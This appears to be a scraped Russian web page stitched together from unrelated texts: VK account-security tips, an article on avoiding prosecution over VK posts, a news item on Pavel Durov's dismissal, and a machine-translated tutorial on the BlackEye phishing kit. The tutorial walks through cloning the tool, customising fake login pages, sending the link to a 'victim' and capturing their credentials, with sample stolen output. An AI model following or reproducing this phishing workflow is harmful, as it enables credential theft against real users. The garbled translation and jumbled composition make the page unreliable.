Как защитить страницу от взлома вк: Как защитить страницу ВКонтакте от взлома.

Как защитить страницу Вконтакте от проникновения хакеров, от взлома, от мошенников

Поговорим о том, как защитить страницу вконтакте, какие меры безопасности принять, как защититься от мошенников и взлома. Вы узнаете какой пароль надежный, как настроить двухфакторную авторизацию и защитить свою страницу на 101%.

Шаг 1. Установите антивирус на компьютер

Антивирус поможет обезвредить программы ворующие пароли — кейлоггеры. Найдет и сообщит о фишинговых сайтах — сайты притворяющиеся популярными.

Кейлоггеры — программы, которые записывают все, что вы вводите с клавиатуры и отсылают своему хозяину. Они могут перехватить пароль от вашей страницы вконтакте и злоумышленник сможет им воспользоваться.

Фишинговые сайты — сайт маскируется под вконтакте. Вы туда заходите, вводите свой логин и пароль, сайт сообщает, что они неверные либо переадресовывает вас на настоящий вконтакте. Вы забываете об этом, а спустя какое-то время вашу страницу взламывают.

Антивирус можно купить или скачать бесплатно.

Из платных антивирусов я рекомендую своим клиентам Доктора Веба или Касперского.

Из бесплатных — авиру и аваст.

Сама пользуюсь встроенным защитником Windows.

Установка антивируса нужна не только для безопасности вконтакте, но и для защиты ваших платежей в интернете, если вы что-то оплачиваете на сайтах с банковской карты.

Шаг 2. Установите надежный пароль

Надежным считается пароль состоящий не менее чем 8 символов в длину, содержащий заглавные и строчные буквы, специальные символы №;%:?*()_-+=.

Чем сложнее пароль, тем дольше его нужно подбирать, чтобы взломать.

Есть специальные программы, которые подбирают пароли методом перебора. Так вот, чтобы подобрать таким методом надежный пароль взломщикам понадобится несколько тысяч лет.

А простые пароли, состоящие из вашей даты рождения или имени злоумышленник может просто угадать.

Не бойтесь сложных паролей, запишите их в блокнот. Я, например, храню файл с паролями на двух флешках. И в случае чего, всегда могу заглянуть туда и вспомнить. Безопасность важнее.

Шаг 3. Настройте двухфакторную аутентификацию

Двухфакторная аутентификация — это подтверждение входа логином и паролем (первый фактор) и кодом, полученным на мобильный телефон (второй фактор).

Эта мера защиты довольно серьезная, нужно пользоваться ей аккуратно, чтобы самому не потерять доступ к странице.

Для восстановления пароля при включенном подтверждении входа нужен доступ к электронной почте и к мобильному телефону, указанным при регистрации.

Т.е. просто имея пароль без доступа к мобильному вы не сможете зайти на свою страницу. Как впрочем и хакер.

Чтобы взломать страницу с двухфакторной авторизацией злоумышленник должен одновременно иметь пароль от вашей страницы, от вашей почты и украсть сим карту от вашего телефона. Практически нерешаемая задача и очень надежный метод защиты.

Подключить подверждение входа можно на по ссылке https://vk.com/settings?act=security

Как только вы включите опцию подтверждения входа, появится строка Резервные коды.

Список резервных кодов ВК для двухфакторной аутентификации

Их можно использовать по одному разу каждый, если у вас в текущий момент не будет доступа к телефону, например, он разрядится.

Распечатайте это список и храните в надежном месте на всякий случай.

Система запрашивает код подтверждения каждый раз, когда вы входите в ВК с нового устройства или браузера.

Когда вы заходите вконтакт с браузера, с которого заходили ранее, вводить код для авторизации не требуется.

Если вы заходите вконтакте не со своего постоянно устройства, то уберите галочку Запомнить браузер, и в следующий раз система запросит код при входе на этом устройстве.

Проверка безопасности Вконтакте

Если вы не будете больше пользоваться устройствами, на которых у вас выполнена авторизация через код, можно снять подтверждение.

Снятие подтверждения авторизации Вконтакте

Если кто-то попытается войти в ваш аккаунт, система выдаст сообщение о попытке входа.

Уведомление о попытке входа

Что нужно сделать перед включением двухфакторной авторизации

1. Привязать к странице свой номер телефона и электронную почту, к которым имеете доступ. Загрузить в альбом настоящие фотографии.
2. Если к странице привязан телефон, то в случае необходимости не получится восстановить через ссылку https://vk.com/restore.
3. Если вы потеряете доступ к телефону и эл.почте, то понадобится предоставить техподдержке фотографии в форме полного восстановления. Поэтому если ваших фото на странице нет, поддержка не сможет проверить вы это или нет.
4. Фотографии на странице можно закрыть от общего доступа, и видеть их будете только вы. Это на случай если вы не хотите, чтобы все подряд, даже ваши друзья просматривали ваши фото. Как скрыть фото читайте в статье https://howvk.ru/privatnost/kak-sdelat-zakrytyj-profil-v-kontakte/

Как обезопасить страницу Вконтакте от взлома и блокировки, а себя от уголовного преследования

2022-10-13T12:02:09Z

Добрый день, друзья! Довольно часто пользователи сайта Вконтакте задаются вопросом: «Как обезопасить свою страницу?», ведь информация на ней может навредить не только своему хозяину. Его аккаунт может стать инструментом в руках злоумышленников, которые могут натворить что угодно.

Чтобы защитить страницу Вконтакте от взлома мошенниками, блокировки администрацией, а также обезопасить себя от уголовного преследования за публикацию запрещенных материалов, следует внимательно отнестись к индивидуальным настройкам аккаунта. Рассмотрим подробнее, что сделать со страницей Вконтакте, чтобы использовать ее было безопасно.

Проверка постов на своей стене

Если провести сравнение всех уголовных дел, возбужденных на основании информации со страниц Вконтакте и, например, на основании материалов из Facebook или Одноклассников, то последних окажется значительно меньше. Так что социальная сеть Вконтакте популярна не только среди миллионов простых пользователей Интернета, но и среди представителей правоохранительных органов.

За преступление сойдет все, что вызывает противоречивые чувства — например, фотография среднего пальца напротив религиозного сооружения, стихотворения о политической ситуации, различные видеоролики и песни. При этом предсказать, что именно послужит поводом возбудить дело против пользователя, не представляется возможным. Практика показывает, что уголовные дела заводят даже из-за фотографий первого Парада Победы, где присутствует свастика.

Конечно, не нужно прибегать к бескомпромиссной самоцензуре, однако необходимо знать о возможных подводных камнях. В случае опасений, лучше всего просто следить за изображениями, видеороликами, gif-анимацией и текстами на своей странице, так или иначе призывающими к неправомерным действиям или задевающими чьи-либо чувства.

Опасный пост также может быть размещен не хозяином страницы, а знакомыми, но на его странице, поэтому нужно проверить настройки приватности и обязательно просмотреть стену, нажав вкладку «Все записи».

Видимость страницы посторонними

Во Вконтакте имеются удобные и тончайшие настройки приватности. Настройке поддаются многие разделы информации, можно выбрать, кто именно будет просматривать тот или иной раздел.

Пользователь выбирает и то, каким образом просматривается профиль. Внизу настроек приватности есть ссылка «Как видят Вашу страницу другие пользователи». Режим позволяет просмотреть, не показываете ли вы лишние данные посторонним. Отредактируйте все до приемлемого уровня, вернувшись на страницу настроек, и перепроверьте снова.

Подумайте, может лучше отредактировать видимость номера телефона, даты рождения, города проживания и прочее. Это поможет сделать кнопка «Редактировать» под картинкой профиля.

Проверка картинок и видео

Стоит учесть, что для появления претензий у правоохранительных органов, вовсе не обязательно запостить на стену что-либо. Достаточно загрузить «неправильную» картинку в альбом, или добавить к себе «оскорбляющую» видеозапись. Поэтому необходимо проверить все видеозаписи, связанные со страницей. В левом меню Вконтакте находиться ссылка на раздел «Видео», в котором есть раздел «Мои Видеозаписи». Следует удалить все ролики с сомнительным содержанием.

Загруженные в соцсеть картинки можно найти в пункте «Фотографии». Во Вконтакте есть особый альбом «Сохраненные фотографии», который пополняется картинками, сохраненными через меню «Сохранить к себе». В начале 2017 года альбом оснастили настройками приватности, теперь при желании он доступен к просмотру исключительно самому пользователю.

Но осторожность нужно проявлять и здесь, поскольку в апреле 2017 года было зафиксировано уголовное преследование, поводом к которому послужила картинка из альбома, скрытого настройками приватности. Остается загадкой, как именно был осуществлен его просмотр.

Проверка документов

Вконтакте можно загружать текстовые документы, архивы, gif-анимацию, pdf-файлы. Для этого сайт оснащен разделом «Документы». Здесь хранятся и документы, отправленные в личных сообщениях.

Раньше этот раздел был общедоступен, порой попадались сканы паспортов, иных важных документов, которые пользователи забывали скрыть настройками приватности. Сейчас раздел скрыт по умолчанию. Но лучше убедиться, что ничего не попало в общий доступ, нажав на «карандашик» напротив каждого файла.

Контроль за подключенными приложениями и сайтами

Многие пользователи зачатую проходят регистрацию или авторизацию через профиль Вконтакте на различных сайтах или мобильных приложениях. Способ довольно удобен — не нужно придумывать и запоминать лишнюю комбинацию логина и пароля. Однако сайты получают взамен некоторую информацию со страницы: например, имя и фамилию, фото профиля, электронную почту.

Обычно в процессе регистрации через сторонний сайт или приложение, пользователь дает на это разрешение. Но порой в списке разрешений значится управление сообществами или доступ к личным сообщениям.

Для того чтобы это исправить, нужно зайти на страницу «Настройки приложений», чтобы просмотреть полный список подключенных сайтов. Теперь можно очистить его от ненужных сервисов, нажав на соответствующий крестик и оставить только те, которые вызывают доверие.

Проверка принадлежности аккаунта

Как ни странно, нужно убедиться, что профиль принадлежит только хозяину. В пункте «Безопасность» отображаются все входы в аккаунт с указанием времени, геолокации и используемого устройства. Если присутствует странный город или незнакомое устройство, стоит задуматься и отреагировать. Обычно достаточно сменить пароль, завершив при этом все сеансы.

Вконтакте следит за безопасностью и предлагает двухэтапную аутентификацию. Включить ее можно там же, в настройках безопасности. Каждый вход с нового устройства или из необычного браузера будет подтверждаться кодом из SMS.

Удаление приложения Вконтакте с телефона

Этот шаг стоит предпринять только при сильной обеспокоенности за безопасность страницы и серьезных подозрениях о потенциальном взломе. Рекомендация действует в отношении всех социальных сетей, и Вконтакте не исключение. Мобильные приложения желают иметь доступ к SMS, контактам и геолокации. Пресс-служба соцсети связывает это с необходимостью подтверждения номера при регистрации аккаунта.

Использование геолокации обусловлено возможностью поиска друзей, размещения таргетированной рекламы, фото с геотегом. С помощью геолокации возможно предлагать пользователю особые маски в «Историях», а также рекомендовать трансляции, которые проходят неподалеку.

Пользователь дает разрешение на использование подобной информации самостоятельно. Однако, если уровень доверия невысок, лучше обойтись без мобильного приложения.

Итак, для того чтобы обезопасить свою страницу Вконтакте, не нужно ничего экстраординарного. Все действия достаточно просты даже для неопытных пользователей и не требуют особых знаний и умений. Лучше сейчас уделить несколько минут этим настройкам, чем в будущем исправлять негативные последствия своей халатности.

Russian Facebook «ВКонтакте» резко уволил первоначального основателя «Павла Дурова»

Вчерашние сообщения показали, что Павел Дуров , 29-летний основатель самой популярной в России социальной сети ВКонтакте (ВК) — российский Facebook , был уволен с поста генерального директора ВКонтакте.

В понедельник Дуров заявил, что социальная сеть ВК теперь полностью контролируется двумя близкими соратниками президента Владимира Путина.

Публично объявив о своем увольнении на своей странице ВКонтакте, он сказал: « Таким образом, сегодня ВКонтакте переходит под полный контроль Игоря Сечина и Алишера Усманова. Наверное, в российских условиях нечто подобное было неизбежно, но я счастливы, что мы продержались семь с половиной лет. Мы сделали многое. И часть того, что было сделано, уже не вернуть назад. ранее в этом месяце он отменил свою отставку с поста генерального директора компании, потому что это была первоапрельская шутка, но, к сожалению, он предположительно не смог должным образом уйти до истечения месячного срока.

ПУТИН СОЮЗНИКИ «АЛИШЕР УСМАНОВ» И «ИГОРЬ СЕЧИН» КОНТРОЛЬ ВКонтакте

Текущие владельцы Алишер Усманов самый богатый человек России и глава сервиса Mail.ru и Игорь Сечин генеральный директор государственной нефтяной компании и, как сообщается, является близким союзником Путина.

Дуров утверждает, что узнал о своей отставке из прессы, а не от правления компании. Интересно, что у акционеров не хватило смелости сделать это напрямую , — написал Дуров на своей странице в ВК, — об этом таинственном увольнении я узнал из прессы. »

Социальная сеть насчитывает более 100 миллионов пользователей, и Дуров как генеральный директор в значительной степени остается вне политики. Он также отказался от предыдущих попыток Кремля подвергнуть ВКонтакте цензуре, в том числе не закрыть страницу конкурента Путина, Алексея Навального. , или украинские протестующие.0009

ДУРОВ ПРОДАЛ СВОИ 12% АКЦИЙ ВК

В январе этого года Павел Дуров неожиданно продал оставшиеся 12% акций ВК, стоимость которых оценивается в $420 млн, главе МегаФона Ивану Таврину, который совладелец Алишер Усманов . Он сказал: « Я никуда не ухожу и буду дальше следить за качеством ВКонтакте. В конце концов, ВКонтакте — это лучшее, что было создано в России в сфере связи. сохранить и защитить сеть »

Дуров основал ВКонтакте в 2006 году с интерфейсом, очень похожим на интерфейс Facebook. Благодаря удобному интерфейсу и практически неограниченному доступу к видео и музыке, свободно загружаемым другими пользователями, социальная сеть приобрела огромную популярность и стала крупнейшей в России. самая ведущая социальная сеть с почти 61 миллионом активных пользователей только в России и около 100 миллионов пользователей по всему миру

Отныне контроль над ВКонтакте находится в руках Mail Group миллиардера Алишера Усманова, которому принадлежит 52 процента акций компании, а остальные 48 процентов контролируется инвестиционной группой United Capital Partners9.0009

На данный момент положение гендиректора очень драматично и пока неясно, кто будет указан в качестве нового гендиректора, а пока руководить ВК будут замгендиректора Борис Добродеев и исполнительный директор Дмитрий Сергеев.

На прошлой неделе во время интервью в прямом эфире на канале «Национальные новости» Эдвард Сноуден задал удивленный вопрос Президенту России Владимиру Путину : « Россия хранит, перехватывает или анализирует каким-либо образом сообщения миллионы особей? », и г-н Президент опроверг это, ответив, что Россия не осуществляет никаких программ массовой слежки, но СМИ всего мира раскритиковали это интервью как пиар-ход, чтобы скрыть сцену российской слежки.

Нашли эту статью интересной? на Facebook, Twitter  и LinkedIn, чтобы прочитать больше эксклюзивного контента, который мы публикуем.

• По Коди
• 16.08.19 16:07
• 29.12.20 10:05
• Лаборатория кибероружия

Аккаунты в социальных сетях — излюбленная цель хакеров, а самая эффективная тактика атаки на аккаунты на таких сайтах, как Facebook, Instagram и Twitter, часто основана на фишинге. Эти атаки с целью кражи паролей основаны на обмане пользователей, заставляющих их вводить свои пароли на поддельной веб-странице, и их становится все проще проводить благодаря таким инструментам, как BlackEye.

BlackEye — это инструмент для быстрого создания фишинговых страниц, нацеленных на веб-сайты социальных сетей, что значительно упрощает фишинг потенциальных целей в той же сети. После перенаправления цели на фишинговую страницу легко перехватить пароли к учетным записям социальных сетей, полученные от ничего не подозревающих целей.

BlackEye для фишинга в социальных сетях

Пользователи очень доверяют своим учетным записям в социальных сетях. Если у цели не включена 2FA, легкость, с которой злоумышленник может получить к ней доступ, может удивить. Одна ошибка при вводе пароля на неверный веб-сайт может привести к потере доступа к вашей учетной записи. BlackEye — это доказательство концепции, показывающее, что для эффективной работы этим фишинговым страницам не нужно усложнять или настраивать их.

• Не пропустите: отслеживайте цель с помощью ссылок для отслеживания Canary Token

BlackEye — это простой скрипт bash, который предлагает несколько шаблонов на выбор, позволяя вам выбрать, какой веб-сайт социальной сети эмулировать. Оттуда он создает функциональный фишинговый сайт на вашем устройстве с возможностью переадресации портов или других способов подключения к машине вашей цели.

Поддерживаемые сайты социальных сетей

BlackEye поддерживает 32 различных веб-сайта с фишинговыми шаблонами, но они различаются по качеству. Лучше протестировать их перед развертыванием, потому что некоторые из них имеют недостатки, которые могут выдать их, если пользователь обратит на них внимание. Хотя фишинговые страницы по умолчанию, предоставляемые BlackEye, довольно хороши, всегда полезно иметь возможность их изменить. Таким образом, вы можете удалить такие вещи, как уведомление об авторских правах, не за тот год.

Среди наиболее интересных веб-сайтов, которые поддерживает BlackEye, — Protonmail, Github, Gitlab, Adobe, Verizon, Twitter, Facebook, Shopify, PayPal и Google. Вы можете быстро протестировать их, выполнив приведенные ниже шаги и щелкнув фишинговый URL-адрес, чтобы узнать, насколько реалистично выглядит каждый шаблон, прежде чем использовать его.

Что вам понадобится

BlackEye — чрезвычайно простой инструмент, но лучше всего он работает в Kali Linux. Это связано с количеством зависимостей, от которых он зависит, но их можно установить по мере необходимости на устройствах Ubuntu или Debian. После того, как вы полностью обновите дистрибутив Kali, вы должны быть готовы установить BlackEye.

• Не пропустите: исследуйте человека или организацию с помощью Operative Framework

Шаг 1: Загрузите и протестируйте BlackEye

Во-первых, нам нужно клонировать исходный код из репозитория BlackEye на GitHub. Для этого откройте новое окно терминала и введите следующие команды git и cd .

Примечание: в этом руководстве мы использовали оригинальный инструмент BlackEye, созданный thelinuxchoice, но с тех пор он был удален с GitHub. Вы можете использовать версию An0nUD4Y, основанную на оригинале thelinuxchoice. Инструкции ниже были обновлены, чтобы использовать этот инструмент вместо этого.

 ~$ клон git https://github.com/An0nUD4Y/blackeye
Клонирование в "черноглазку"...
удаленный: Перечисление объектов: 361, сделано.
удаленный: Всего 361 (дельта 0), повторно использовано 0 (дельта 0), повторно использовано в пакете 361
Получение объектов: 100% (361/361), 8,01 МБ | 3,17 МБ/с, готово.
Разрешение дельт: 100% (101/101), выполнено.
~$ cd черный глаз
~/blackeye$ 

Это должно установить репозиторий BlackEye и разрешить ему запускать его из папки blackeye с помощью команды bash blackeye.sh . Когда мы запускаем команду, мы должны увидеть заставку ниже.

 ~/blackeye$ bash blackeye.sh
:: Отказ от ответственности: Разработчики не несут ответственности и не являются ::
     :: несет ответственность за любое неправильное использование или ущерб, причиненный BlackEye. ::
     :: Использовать только в образовательных целях! ::
     :: Нападение на цели без взаимного согласия является незаконным! ::
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Snapchat [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Твиттер [20] Криптовалюта ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Messenger ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Linkedin [29] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] ВКонтакте ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Яндекс ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] DevianART КОДИРОВАНО: @thelinuxchoice
                                                 ОБНОВЛЕНО: @suljot_gjoka 

Шаг 2.

Настройка фишинговых веб-сайтов

Если нам не нравится уведомление об авторских правах с истекшим сроком действия, мы можем довольно легко изменить его. Сначала выйдите из скрипта bash обратно в папку blackeye. Затем мы введем ls , чтобы увидеть папку сайтов в репозитории BlackEye.

 ~/blackeye$ ls
blackeye.sh LICENSE README.md sites 

Мы можем перейти к нему с помощью команды cd sites . Затем введите ls , чтобы увидеть все доступные для изменения шаблоны фишинговых сайтов.

 ~/blackeye$ cd сайты
~/черный глаз/сайты$ лс
adobe криптовалюта facebook google linkedin myspace paypal shopify Spotify twitter wordpress
Badoo Devianart github instafollowers messenger netflix pinterest shopping steam verizon yahoo
создать dropbox gitlab instagram microsoft origin protonmail snapchat twitch vk yandex 

Чтобы редактировать Protonmail, мы можем ввести cd protonmail , а затем ls еще раз, чтобы увидеть файлы в этой папке. Вы должны увидеть что-то вроде файлов ниже.

 ~/blackeye/sites$ cd protonmail
~/blackeye/sites/protonmail$ ls
index_files index.php ip.php ip.txt login.html login.php save.ip.txt save.usernames.txt 

Чтобы отредактировать HTML-код фишинговой страницы, вы можете сделать это напрямую, открыв login.html с помощью текстовый редактор, позволяющий легко обновлять любые уведомления об авторских правах или другие сведения.

Шаг 3. Предоставление фишинговой информации Страница

Чтобы запустить нашу фишинговую страницу, откройте окно терминала и снова перейдите в папку blackeye. Затем выполните команду bash blackeye.sh , чтобы вернуться в меню выбора фишинговой страницы. Здесь мы выберем eBay под номером 18.

 ~/blackeye/sites/protonmail$ cd
~$ cd черный глаз
~/blackeye$ bash blackeye.sh
[01] Instagram [17] IGFollowers [33] Custom BLACKEYE v1.1
[02] Facebook [18] eBay ▒▒▒▒▒▒▒▒▄▄▄▄▄▄▄▄▒▒▒▒▒▒
[03] Снапчат [19] Pinterest ▒▒█▒▒▒▄██████████▄▒▒▒▒
[04] Твиттер [20] Криптовалюта ▒█▐▒▒▒████████████▒▒▒▒
[05] Github [21] Verizon ▒▌▐▒▒██▄▀██████▀▄██▒▒▒
[06] Google [22] DropBox ▐┼▐▒▒██▄▄▄▄██▄▄▄▄██▒▒▒
[07] Spotify [23] Adobe ID ▐┼▐▒▒██████████████▒▒▒
[08] Netflix [24] Shopify ▐▄▐████─▀▐▐▀█─█─▌▐██▄▒
[09] PayPal [25] Мессенджер ▒▒█████──────────▐███▌
[10] Origin [26] GitLab ▒▒█▀▀██▄█─▄───▐─▄███▀▒
[11] Steam [27] Twitch ▒▒█▒▒███████▄██████▒▒▒
[12] Yahoo [28] MySpace ▒▒▒▒▒██████████████▒▒▒
[13] Линкедин [29]] Badoo ▒▒▒▒▒█████████▐▌██▌▒▒▒
[14] Protonmail [30] ВКонтакте ▒▒▒▒▒▐▀▐▒▌▀█▀▒▐▒█▒▒▒▒▒
[15] WordPress [31] Яндекс ▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▌▒▒▒▒▒
[16] Microsoft [32] DevianART КОДИРОВАНО: @thelinuxchoice
                                                 ОБНОВЛЕНО: @suljot_gjoka
[*] Выберите вариант: 18 

После ввода номера сайта, который вы хотите создать, нажмите введите . Далее нас попросят указать наш IP-адрес. Если вы нажмете ввод, не добавив его, он попытается добавить ваш по умолчанию, но это не всегда работает. После ввода вашего IP-адреса вы должны увидеть что-то вроде приглашения ниже.

 [*] Укажите ваш локальный IP (по умолчанию 10.0.6.27):
[*] Запуск php сервера...
[*] Отправить эту ссылку Жертве: 192.168.0.16
[*] Ожидание открытия ссылки жертвой... 

Далее перейдите по фишинговой ссылке в браузере, чтобы увидеть результат фишинга вашего сайта.

Шаг 4. Перехват пароля

Когда вы открываете сайт в браузере, он должен выглядеть примерно так:

При открытии ссылки сценарий сообщает о типе устройств, которые в настоящее время обращаются к фишинговой странице.

 [*] Ожидающая жертва откройте ссылку...
[*] IP найден!
[*] IP жертвы: 192.168.43.142
[*] User-Agent: User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
[*] Сохранено: shopping/saved.ip.txt 

Как только цель вводит свои учетные данные, она перенаправляется на настоящую страницу eBay, создавая иллюзию успешного входа.

Со стороны хакера BlackEye предоставляет нам учетные данные, которые только что ввела наша цель.

 [*] Ожидание учетных данных...
[*] Учетные данные найдены!
[*] Аккаунт: fudruckers
[*]Пароль: thefudruckerking69[*] Сохранено: sites/shopping/saved.usernames.txt 

Таким образом, мы перехватили и сохранили учетные данные, которые цель ввела на нашу фишинговую страницу!

Фишинг сайтов социальных сетей — это быстро и просто

Когда дело доходит до предотвращения подобных атак, двухфакторная аутентификация — лучший друг среднего пользователя. Без него одна ошибка может привести к тому, что ваш пароль будет украден и использован злоумышленником для доступа к вашей учетной записи. Так что настройте 2FA на Facebook, Instagram и любых других учетных записях, которые у вас есть.

Еще одним шагом к повышению безопасности является использование аппаратного ключа безопасности, который требует от новых устройств использования вашего ключа для входа в систему, делая украденные пароли и даже перехваченные текстовые сообщения бесполезными.